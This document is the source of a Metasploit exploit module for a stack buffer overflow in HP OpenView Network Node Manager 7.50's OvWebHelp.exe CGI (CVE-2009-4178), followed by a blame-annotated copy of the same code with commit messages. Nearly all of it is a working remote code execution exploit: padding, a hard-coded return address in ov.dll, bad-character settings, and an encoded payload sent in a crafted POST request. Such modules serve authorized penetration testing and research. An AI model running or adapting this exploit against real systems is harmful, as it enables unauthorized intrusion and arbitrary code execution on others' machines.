modules/exploits/windows/http/hp_nnm_ovwebhelp.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.
        By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute
        arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2009-4178' ],
          [ 'OSVDB', '60929' ],
          [ 'BID', '37340' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 650,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'HP OpenView Network Node Manager 7.50', { 'Ret' => 0x5a01d78d } ], # ov.dll
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 9 2009'))
  end

  def exploit

    sploit = rand_text_alpha_upper(5123) + [target.ret].pack('V') + payload.encoded

    print_status("Trying target #{target.name}...")

    send_request_cgi({
      'uri'		=> "/OvCgi/OvWebHelp.exe",
      'method'	=> "POST",
      'data'		=> "Topic=#{sploit}",
      }, 3)

    handler

  end
end
put it back. will not play with svn for a month. 2010-06-04 14:55:51 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
put it back. will not play with svn for a month. 2010-06-04 14:55:51 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 16:28:54 -05:00			`Rank = GreatRanking`
put it back. will not play with svn for a month. 2010-06-04 14:55:51 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`include Msf::Exploit::Remote::HttpClient`
put it back. will not play with svn for a month. 2010-06-04 14:55:51 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.`
			`By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute`
			`arbitrary code.`
			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2009-4178' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '60929' ],`
Retab modules 2013-08-30 16:28:54 -05:00			`[ 'BID', '37340' ],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
			`},`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 650,`
			`'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'HP OpenView Network Node Manager 7.50', { 'Ret' => 0x5a01d78d } ], # ov.dll`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Dec 9 2009'))`
			`end`
put it back. will not play with svn for a month. 2010-06-04 14:55:51 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def exploit`
put it back. will not play with svn for a month. 2010-06-04 14:55:51 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`sploit = rand_text_alpha_upper(5123) + [target.ret].pack('V') + payload.encoded`
put it back. will not play with svn for a month. 2010-06-04 14:55:51 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`print_status("Trying target #{target.name}...")`
put it back. will not play with svn for a month. 2010-06-04 14:55:51 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`send_request_cgi({`
			`'uri' => "/OvCgi/OvWebHelp.exe",`
			`'method' => "POST",`
			`'data' => "Topic=#{sploit}",`
			`}, 3)`
put it back. will not play with svn for a month. 2010-06-04 14:55:51 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`handler`
put it back. will not play with svn for a month. 2010-06-04 14:55:51 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`end`
put it back. will not play with svn for a month. 2010-06-04 14:55:51 +00:00			`end`